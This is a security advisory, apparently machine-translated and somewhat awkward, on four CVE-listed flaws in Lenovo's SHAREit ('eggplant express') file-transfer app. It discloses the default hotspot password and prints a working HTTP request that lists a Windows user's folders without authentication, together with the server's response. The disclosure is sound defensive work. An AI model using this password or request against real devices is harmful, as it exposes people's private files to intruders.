Lenovo eggplant express connect has been exposed to multiple vulnerabilities

Lenovo eggplant express connect has been exposed to multiple vulnerabilities

The Lenovo direct it (Eggplant quickbi) service is vulnerable to hard-coded passwords, information leaks, unencrypted sensitive information, and unauthorized vulnerabilities. The vulnerability was submitted by Ivan Huertas, a Security researcher from the Core Security Consulting team, this report is from Joaquín Rodr íguez Varela from the same team.

 

Eggplant fast transmission is the fastest cross-platform near-field transmission software to date. It supports Android, apple, computer, WP, and other devices and more than 30 languages. It is easy to operate and convenient. During transmission, files can be uploaded to each other without traffic, network, or account logon. The transmission speed is 200 times faster than that of Bluetooth. It is also a software that can implement file transfer without clients. Eggplant Express has more than 0.4 billion Loyal users around the world, truly allowing users to share their happiness in their lives.

Verified vulnerabilities include Android 3.0.18 _ ww and Windows 2.5.1.1. Other versions may be affected, but not yet verified. However, Lenovo has released an updated version to fix the vulnerabilities in the above two versions.

1. Lenovo eggplant express pass Windows Version hardcoded password [CVE-2016-1491]

When a file is received using the Lenovo hotspot it Windows version, the password for the wifi hotspot is set to 12345678. Any system with a wireless Nic can use this password to connect to the hotspot. This password is the default one!

2. Lenovo eggplant express pass Windows Remote File Viewing [CVE-2016-1490]

When the wifi hotspot network is enabled and the default password 12345678 is used to connect to the service, http requests can be sent to the WebServer Service (http-like server) started by quick transmission to read files, however, files cannot be downloaded. The requested data packet is as follows:

POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)Host: 192.168.173.1:2999Connection: Keep-AlivekAccept-Encoding: gzipContent-Length: 0HTTP/1.0 200 OKContent-Length: 2426  {"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links","has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"MyMusic","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"MyPictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\SavedGames","has_thumbnail":false,"id":"C:\\Users\\admin\\SavedGames","isloaded":false,"isroot":false,"isvolume":false,"name":"SavedGames","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}

3. The communication process of eggplant quickbi for Windows and Android is not encrypted [CVE-2016-1489]

Files are not encrypted during http transmission. Attackers can view the transmitted data through the sniffing network or directly launch man-in-the-middle attacks, such as tampering with the transmitted content.

4. Enable public wifi login without a password on Android devices [CVE-2016-1492]

When an application is set to receive files, a public wifi hotspot that can be accessed without a password will also be created. Attackers can capture communication information on these devices when connecting to the wifi.